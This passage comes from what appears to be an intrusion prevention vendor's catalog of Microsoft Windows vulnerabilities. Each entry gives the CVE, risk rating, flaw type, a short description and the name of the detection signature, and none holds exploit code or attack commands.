Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Windows
Situation: IPv6_Microsoft-Windows-IPv6-DoS-Vulnerability-CVE-2014-0254
References:
CVE-2014-0254
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0254
MS14-006
http://technet.microsoft.com/security/bulletin/MS14-006
Back to top

Microsoft-Windows-IPv6-Router-Advertisement-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Microsoft Windows TCP/IP stack. The vulnerability is due to insufficient bounds checking when handling incoming IPv6 Router Advertisement packets. This vulnerability may be exploited by remote unauthenticated attackers by sending specially crafted packets to the affected host. In attack scenarios where code execution is successful the behaviour of the target machine is completely dependent on the intention of the injected code, which will run in the kernel security context. In cases where code execution is not successful the affected product may terminate abnormally to cause a deny of service condition.
Situation: IP_Length-Inconsistency
IPv6_Microsoft-Windows-IPv6-Router-Advertisement-Stack-Buffer-Overflow
References:
CVE-2010-0239
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0239
MS10-009
http://technet.microsoft.com/security/bulletin/MS10-009
Back to top

Microsoft-Windows-iSCSI-Target-CVE-2014-0255-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft Windows Server
Risk: High
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2
Software: <os>
Type: Resource Starvation
Description: A denial-of-service vulnerability exists in Microsoft Windows Servers where the iSCSI target role is enabled. The vulnerability is due to memory exhaustion when handling iSCSI packets. A remote, unauthenticated attacker could exploit this vulnerability by sending a large number of specially crafted iSCSI packets to the server. Successful exploitation could lead to a denial-of-service condition.
Situation: Generic_CS-iSCSI-Login-Request
References:
CVE-2014-0255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0255
OSVDB-106897
http://www.osvdb.org/106897
MS14-028
http://technet.microsoft.com/security/bulletin/MS14-028
Back to top

Microsoft-Windows-ITS-Protocol-Information-Disclosure-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1029-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Improper parsing of the InfoTech Storage (ITS) protocol requests causes an information disclosure vulnerability in Windows. A successful exploit allows an attacker to gain access to NTLM and other information.
Situation: File-Text_Microsoft-Windows-ITS-Protocol-Information-Disclosure-Vulnerability
References:
CVE-2017-11927
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11927
Back to top

Microsoft-Windows-Itss.dll-CHM-File-Handling-Heap-Corruption

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a vulnerability in the Microsoft Windows Infotech Storage Library. The flaw is created due to a lack of verification of a user supplied value, before using it as the size argument in a memory allocation call. Exploitation of this flaw may result in process flow diversion of the vulnerable application. In an attack case where code injection is not successful, the vulnerable application using the affected library will terminate immediately. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.
Situation: File-Binary_Microsoft-Windows-Itss.dll-CHM-File-Handling-Heap-Corruption
References:
CVE-2006-2297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2297
BID-17926
http://www.securityfocus.com/bid/17926
OSVDB-25501
http://www.osvdb.org/25501
Back to top

Microsoft-Windows-Jet-Database-CVE-2019-0891-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1190-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A vulnerability in the Jet Database Engine component of Microsoft Windows which allows remote attackers to execute arbitrary code by enticing a user to open a specially crafted file, due to the improper handling of objects in memory.
Situation: File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-0891-Remote-Code-Execution
References:
CVE-2019-0891
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0891
Back to top

Microsoft-Windows-Jet-Database-CVE-2019-1242-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A vulnerability in the Jet Database Engine component of Microsoft Windows which allows remote attackers to execute arbitrary code by sending a target user a crafted file, due to the improper handling of objects in memory.
Situation: File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1242-Remote-Code-Execution
References:
CVE-2019-1242
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1242
Back to top

Microsoft-Windows-Jet-Database-CVE-2019-1243-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1192-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There exists a remote code execution vulnerability in the Jet Database Engine component of Microsoft Windows. Successful exploitation could lead in arbitrary code execution.
Situation: File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1243-Remote-Code-Execution
References:
CVE-2019-1243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1243
Back to top

Microsoft-Windows-Jet-Database-CVE-2019-1249-RCE

About this vulnerability: A vulnerability in Microsoft Windows Jet Database Engine.
Risk: High
First detected in: sgpkg-ips-1371-5242
Last changed: sgpkg-ips-1371-5242
Platform: Windows
Software: Jet Database Engine
Type: Input Validation
Description: A vulnerability in the Jet Database Engine component of Microsoft Windows which allows remote attackers to execute arbitrary code by sending a crafted file to the target user, due to improper handling of objects in memory.
Situation: File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1249-RCE
References:
CVE-2019-1249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1249
Back to top

Microsoft-Windows-Jet-Database-CVE-2019-1250-RCE

About this vulnerability: A vulnerability in Microsoft Windows Jet Database Engine.
Risk: High
First detected in: sgpkg-ips-1372-5242
Last changed: sgpkg-ips-1372-5242
Platform: Windows
Software: Jet Database Engine
Type: Input Validation
Description: A vulnerability in the Jet Database Engine component of Microsoft Windows which allows remote attackers to execute arbitrary code by sending a crafted file to the target user, due to improper handling of objects in memory.
Situation: File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1250-RCE
References:
CVE-2019-1250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1250
Back to top

Microsoft-Windows-Jet-Database-CVE-2019-1358-RCE

About this vulnerability: A vulnerability in Microsoft Windows Jet Database Engine.
Risk: High
First detected in: sgpkg-ips-1372-5242
Last changed: sgpkg-ips-1372-5242
Platform: Windows
Software: Jet Database Engine
Type: Input Validation
Description: A vulnerability in the Jet Database Engine component of Microsoft Windows which allows remote attackers to execute arbitrary code by sending a crafted file to the target user, due to improper handling of objects in memory.
Situation: File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1358-RCE
References:
CVE-2019-1358
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1358
Back to top

Microsoft-Windows-Jet-Database-CVE-2019-1359-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in Microsoft Windows Jet Database Engine.
Risk: High
First detected in: sgpkg-ips-1372-5242
Last changed: sgpkg-ips-1372-5242
Platform: Windows
Software: Jet Database Engine
Type: Malfunction
Description: A vulnerability in the Jet Database Engine component of Microsoft Windows which allows remote attackers to execute arbitrary code by sending a crafted file to the target user, due to improper handling of objects in memory.
Situation: File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1359-Out-Of-Bounds-Write
References:
CVE-2019-1359
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1359
Back to top

Microsoft-Windows-Jet-Database-CVE-2019-1406-Off-By-One

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1255-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Improper handling of Jet database files causes an off by one vulnerability in Windows. A successful exploit may allow an attacker to execute code on the target system.
Situation: File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1406-Off-By-One
References:
CVE-2019-1406
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1406
Back to top

Microsoft-Windows-Jet-Database-Engine-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1107-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Improper parsing of fields within an MDB database file causes a code execution vulnerability in Microsoft Jet Database Engine. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: File-Binary_Microsoft-Windows-Jet-Database-Engine-Code-Execution
References:
CVE-2018-8423
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8423
Back to top

Microsoft-Windows-Jet-Database-Engine-Createlvsmlocs-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A type confusion vulnerability has been reported in the Microsoft JET Database Engine components. The vulnerability is due to improper parsing of a database table. A remote, unauthenticated attacker can exploit the vulnerability by enticing a user to open a specially crafted JET database file while using an affected version of Microsoft Windows. Successful exploitation results in arbitrary code execution under the context of the process.
Situation: File-Binary_Microsoft-Windows-Jet-Database-Engine-Createlvsmlocs-Code-Execution
References:
CVE-2019-0577
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0577
Back to top

Microsoft-Windows-Jet-Database-Engine-CVE-2020-1074-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1294-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A remote code execution vulnerability have been reported in Microsoft Windows Jet Database Engine. The vulnerability is due to improper handling of objects in memory. A remote attacker could exploit this vulnerabilities by enticing a user to open a specially crafted file or visit a malicious website. Successful exploitation results in the execution of arbitrary code in the security context of the target user.
Situation: File-Binary_Microsoft-Windows-Jet-Database-Engine-CVE-2020-1074-Remote-Code-Execution
References:
CVE-2020-1074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1074
ms20-sep
http://technet.microsoft.com/security/bulletin/ms20-sep
Back to top

Microsoft-Windows-Jet-Database-Engine-Physical-Index-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An out-of-bounds read vulnerability has been reported in the Microsoft JET Database Engine components. The vulnerability is due to improper parsing of the physical index count field of a database table. A remote, unauthenticated attacker can exploit the vulnerability by enticing a user to open a specially crafted JET database file while using an affected version of Microsoft Windows. Successful exploitation of this vulnerability could result in disclosure of sensitive information.
Situation: File-Binary_Microsoft-Windows-Jet-Database-Engine-Physical-Index-Out-Of-Bounds-Read
References:
CVE-2019-0575
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0575
Back to top

Microsoft-Windows-KDC-Proxy-KpsSocketRecvDataIoCompletion-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows KDC Proxy
Risk: High
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Platform: Windows
Software: Microsoft Windows KDC Proxy
Type: Integer Overflow
Description: A vulnerability in Microsoft Windows KDC Proxy, in multiple version of Microsoft Windows Server, which allows remote attackers to direct a KDC proxy to forward a Kerberos request to a server under their control, initiating a crafted Kerberos response, which could lead to arbitary code excution on the target machine.
Situation: Generic_SS-Microsoft-Windows-KDC-Proxy-KpsSocketRecvDataIoCompletion-Integer-Overflow
References:
CVE-2024-43639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43639
Back to top

Microsoft-Windows-Kerberos-KDC-Privilege-Escalation

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7; Windows 8; Windows 8.1; Windows Vista; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2
Software: <os>
Type: Malfunction
Description: A privilege escalation vulnerability exists in implementations of Kerberos KDC in Microsoft Windows. The vulnerability is due to a failure to properly validate signatures allowing certain aspects of a Kerberos service ticket to be forged. An attacker with valid domain credentials can exploit this vulnerability to gain domain administrator privileges, which can be used to further compromise any computer in the domain including domain controllers.
Situation: Generic_CS-Microsoft-Windows-Kerberos-KDC-Privilege-Escalation
References:
CVE-2014-6324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6324
OSVDB-114751
http://www.osvdb.org/114751
MS14-068
http://technet.microsoft.com/security/bulletin/MS14-068
Back to top

Microsoft-Windows-Kernel-SMB2-DOS

About this vulnerability: Denial of Service condition in Windows Kernel SMB2
Risk: High
First detected in: sgpkg-ips-266-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a Denial of Service condition in the Windows Kernel SMB2 handling.
Situation: NetBIOS-TCP_SMB2-Windows-Kernel-DOS
References:
CVE-2009-3676
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3676
MS10-020
http://technet.microsoft.com/security/bulletin/MS10-020
Back to top

Microsoft-Windows-Kodak-Image-Viewer-Code-Execution

About this vulnerability: A buffer overflow vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-129-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000 SP4; Windows XP SP2; Windows 2003 SP1; Windows 2003 SP2
Software: <os>
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Windows Kodak Image Viewer. The vulnerability is due to improper parsing of specially crafted TIFF image files. An attacker can exploit the vulnerability by constructing a specially crafted image and enticing a victim to open the malicious image with an affected version of product. Successful exploitation of this vulnerability would result in arbitrary code execution in the context of the logged-in user.
Situation: E-Mail_BS-Microsoft-Windows-Kodak-Image-Viewer-Code-Execution
HTTP_SS-Microsoft-Windows-Kodak-Image-Viewer-Code-Execution
File-Binary_Microsoft-Windows-Kodak-Image-Viewer-Code-Execution
References:
CVE-2007-2217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2217
BID-25909
http://www.securityfocus.com/bid/25909
MS07-055
http://technet.microsoft.com/security/bulletin/MS07-055
Back to top

Microsoft-Windows-Lanman-Denial-Of-Service

About this vulnerability: A denial of service vulnerability in Microsoft Windows Lanman service
Risk: Low
First detected in: sgpkg-ips-92-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000 SP0; Windows 2000 SP1; Windows 2000 SP2
Software: <os>
Type: Resource Starvation
Description: There is a denial of service vulnerability in Microsoft Windows Lanman service. A flood of invalid packets can lead to excessive memory and processor usage.
Situation: NetBIOS-TCP_Microsoft-Windows-Lanman-Denial-Of-Service
References:
CVE-2002-0597
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0597
BID-4532
http://www.securityfocus.com/bid/4532
OSVDB-5179
http://www.osvdb.org/5179
Back to top

Microsoft-Windows-LDAP-Remote-Code-Execution-Vulnerability-CVE-2025-21376

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1835-5242
Last changed: sgpkg-ips-1835-5242
Platform: Windows
Software: Windows Server
Type: Malfunction
Description: A remote code execution vulnerability exists in Windows Server due to the handling of Lightweight Directory Access Protocol (LDAP) requests.
Situation: LDAP_CS-Microsoft-Windows-LDAP-Remote-Code-Execution-Vulnerability-CVE-2025-21376
References:
CVE-2025-21376
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21376
ms25-feb
http://technet.microsoft.com/security/bulletin/ms25-feb
Back to top

Microsoft-Windows-LDAP-Searchresultdone-Integer-Overflow-CVE-2024-49112

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Critical
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Platform: Windows
Software: <os>
Type: Integer Overflow
Description: An integer overflow vulnerability exists in implementation of the Lightweight Directory Access Protocol (LDAP) in Microsoft Windows. A remote, unauthenticated attacker can exploit this vulnerability by sending crafted RPC calls to the LDAP server, triggering a lookup of the attacker's domain. Successful exploitation could result in execution of arbitrary code in the context of the vulnerable service.
Situation: LDAP_SS-Microsoft-Windows-LDAP-Searchresultdone-Integer-Overflow-CVE-2024-49112
References:
CVE-2024-49112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49112
ms24-dec
http://technet.microsoft.com/security/bulletin/ms24-dec
Back to top

Microsoft-Windows-Libarchive-Execute_Filter_e8-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1720-5242
Last changed: sgpkg-ips-1720-5242
Platform: Windows
Software: <os>
Type: Integer Overflow
Description: An integer overflow vulnerability exists in the Libarchive library included in Microsoft Windows. The vulnerability is due to insufficient bounds checks on the block length of a RARVM filter used for Intel E8 preprocessing, included in the compressed data of a RAR archive. A remote attacker could exploit this vulnerability by enticing a target user into extracting a crafted RAR archive. Successful exploitation could result in arbitrary code execution in the context of the application using the vulnerable library.
Situation: File-Binary_Microsoft-Windows-Libarchive-Execute_Filter_e8-Integer-Overflow
References:
CVE-2024-20697
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20697
ms24-jan
http://technet.microsoft.com/security/bulletin/ms24-jan
Back to top

Microsoft-Windows-Libarchive-Run_Filters-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1720-5242
Last changed: sgpkg-ips-1720-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability has been reported for the Libarchive library included in Microsoft Windows. The vulnerability is due to insufficient bounds checks on the block length of a RARVM filter, included in the compressed data of a RAR archive. A remote attacker could exploit this vulnerability by enticing a target user into extracting a crafted RAR archive. Successful exploitation could result in arbitrary code execution in the context of the application using the vulnerable library.
Situation: File-Binary_Microsoft-Windows-Libarchive-Run_Filters-Heap-Buffer-Overflow
References:
CVE-2024-26256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-26256
ms24-apr
http://technet.microsoft.com/security/bulletin/ms24-apr
Back to top

Microsoft-Windows-License-Logging-Service-Buffer-Overflow-CVE-2005-0050

About this vulnerability: Buffer overflow vulnerability in Microsoft Windows License Logging service
Risk: High
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows NT 4.0; Windows 2000; Windows 2003 SP0
Software: <os>
Type: Malfunction
Description: The Microsoft Windows Server License Logging service contains a buffer overflow vulnerability caused by improper validation of the length of messages. A remote attacker could exploit this vulnerability to cause a denial of service and possibly to execute arbitrary code on the server.
Situation: MSRPC-TCP_CPS-Microsoft-License-Logging-Service-Buffer-Overflow-CVE-2005-0050
MSRPC-TCP_CPS-Microsoft-License-Logging-Service-Buffer-Overflow-CVE-2005-0050-2
References:
CVE-2005-0050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0050
BID-12481
http://www.securityfocus.com/bid/12481
OSVDB-13599
http://www.osvdb.org/13599
MS05-010
http://technet.microsoft.com/security/bulletin/MS05-010
Back to top

Microsoft-Windows-LNK-NTLM-Relay

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1752-5242
Last changed: sgpkg-ips-1752-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Improper handling of LNK files causes an NTLM relay vulnerability in Windows. A successful exploitation allows an attacker to authenticate to services as the target user.
Situation: File-Binary_Microsoft-Windows-LNK-NTLM-Relay
References:
CVE-2024-30081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30081
Back to top

Microsoft-Windows-LNK-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1226-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a vulnerability in Microsoft Windows, multiple versions, which allows remote attackers to execute arbitrary code due to the insufficient handling of LNK files.
Situation: File-Binary_Microsoft-Windows-LNK-Remote-Code-Execution
References:
CVE-2020-0729
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0729
Back to top

Microsoft-Windows-LNK-Remote-Code-Execution-CVE-2020-1421

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1265-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Improper handling of LNK files causes a remote code execution in Windows.
Situation: File-Binary_Microsoft-Windows-LNK-Remote-Code-Execution-CVE-2020-1421
References:
CVE-2020-1421
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1421
Back to top

Microsoft-Windows-LSASS-Recursive-Stack-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-264-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000 Server; Windows 2003; Windows 2008; Windows XP
Software: <os>
Type: Malfunction
Description: There is a stack overflow vulnerability in Microsoft Windows.
Situation: Analyzer_Microsoft-Windows-LSASS-Recursive-Stack-Overflow
LDAP_CS-Microsoft-Windows-LSASS-Recursive-Stack-Overflow
LDAP_CS-MS09-066
References:
CVE-2009-1928
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1928
MS09-066
http://technet.microsoft.com/security/bulletin/MS09-066
Back to top

Microsoft-Windows-Mail-Remote-Code-Execution-CVE-2011-2016

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-422-4219
Last changed: sgpkg-ips-1638-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows involving the loading of a malicious DLL file while opening a legitimate EML or WCINV file
Situation: HTTP_CSU-Microsoft-Windows-Address-Book-Insecure-Library-Loading-CVE-2010-3147
SMB-TCP_Microsoft-Windows-Wab32res.dll-Insecure-Library-Loading
References:
CVE-2011-2016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2016
MS11-085
http://technet.microsoft.com/security/bulletin/MS11-085
Back to top

Microsoft-Windows-Mailslot-Heap-Overflow

About this vulnerability: Heap buffer overflow vulnerability in the Server driver of Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003
Software: <os>
Type: Buffer Overflow
Description: There is a heap-based buffer overflow vulnerability in the Server driver of Microsoft Windows. A successful exploit against this vulnerability leads to a denial of service or arbitrary code execution with the privileges of the System kernel.
Situation: SMB-TCP_CHS-First-Class-Mailslot-Traffic-Detected
References:
CVE-2006-1314
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1314
BID-18863
http://www.securityfocus.com/bid/18863
OSVDB-27154
http://www.osvdb.org/27154
MS06-035
http://technet.microsoft.com/security/bulletin/MS06-035
Back to top

Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21189

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A security feature bypass vulnerability exists in the MapUrlToZone API of Microsoft Windows.
Situation: File-Text_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21189
File-Text_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21189-2
File-Binary_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21189
References:
CVE-2025-21189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21189
ms25-jan
http://technet.microsoft.com/security/bulletin/ms25-jan
Back to top

Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21219

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A security feature bypass vulnerability exists in the MapUrlToZone API of Microsoft Windows.
Situation: File-Text_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21219
File-Text_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21219-2
File-Binary_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21219
References:
CVE-2025-21219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21219
ms25-jan
http://technet.microsoft.com/security/bulletin/ms25-jan
Back to top

Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21268

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A security feature bypass vulnerability exists in the MapUrlToZone API of Microsoft Windows.
Situation: File-Text_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21268
References:
CVE-2025-21268
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21268
ms25-jan
http://technet.microsoft.com/security/bulletin/ms25-jan
Back to top

Microsoft-Windows-Media-ASF-Header-Parsing-Invalid-Free

About this vulnerability: A vulnerability in Windows Media Services
Risk: Moderate
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Media Services
Type: Directory Traversal
Description: A remote code execution vulnerability exists in the way that Microsoft Windows handles specially crafted ASF format files. This vulnerability could allow remote code execution if a user opened a specially crafted file.
Situation: File-Binary_Microsoft-Windows-Media-ASF-Header-Parsing-Invalid-Free
References:
CVE-2009-2498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2498
MS09-047
http://technet.microsoft.com/security/bulletin/MS09-047
Back to top

Microsoft-Windows-Media-Center-Insecure-Library-Loading

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An insecure library loading vulnerability has been reported in Microsoft Windows Media Center. The vulnerability is due to a design weakness exhibited while loading a DLL. A remote attacker could exploit this vulnerability by enticing a target user to open a file associated with Windows Media Center from an SMB or WebDAV share. A successful attack could result in the execution of arbitrary code in security context of the target user.
Situation: HTTP_CSU-Microsoft-Windows-Media-Center-Insecure-Library-Loading
SMB-TCP_CHS-Microsoft-Windows-Media-Center-Insecure-Library-Loading
References:
CVE-2011-2009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2009
OSVDB-76205
http://www.osvdb.org/76205
MS11-076
http://technet.microsoft.com/security/bulletin/MS11-076
Back to top

Microsoft-Windows-Media-Center-MCL-File-Code-Execution

About this vulnerability: A vulnerability in Windows Media Center
Risk: High
First detected in: sgpkg-ips-679-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows 7; Windows 8
Software: <os>
Type: Input Validation
Description: There is a remote code execution vulnerability in Microsoft's Windows Media Center related to handling MCL files.
Situation: SMB-TCP_Microsoft-Windows-Media-Center-MCL-File-Code-Execution
File-Text_Microsoft-Windows-Media-Center-MCL-File-Code-Execution
References:
CVE-2015-2509
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2509
MS15-100
http://technet.microsoft.com/security/bulletin/MS15-100
Back to top

Microsoft-Windows-Media-CVE-2016-0101-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a code execution vulnerability in Microsoft Windows Media. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Binary_Microsoft-Windows-Media-CVE-2016-0101-Code-Execution
References:
CVE-2016-0101
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0101
MS16-027
http://technet.microsoft.com/security/bulletin/MS16-027
Back to top

Microsoft-Windows-Media-Device-Manager-Insecure-Library-Loading

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-663-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7; Windows Vista; Windows 2003; Windows 2008; Windows 2008 R2
Software: <os>
Type: Malfunction
Description: An insecure library loading vulnerability exists in Microsoft Windows Media Device Manager. The vulnerability is due to the way that the affected component handles the loading of dynamically-linked library (.dll) files. A remote attacker could exploit this vulnerability by enticing a target user to open an Office file from an SMB or WebDAV share. A successful attack could result in the execution of arbitrary code in the security context of the target user.
Situation: File-OLE_Microsoft-Windows-Media-Device-Manager-Insecure-Library-Loading
File-RTF_Microsoft-Windows-Media-Device-Manager-Insecure-Library-Loading
References:
CVE-2015-2369
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2369
MS15-069
http://technet.microsoft.com/security/bulletin/MS15-069
Back to top

Microsoft-Windows-Media-Encoder-9-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows Media Encoder 9
Risk: High
First detected in: sgpkg-ips-167-2032
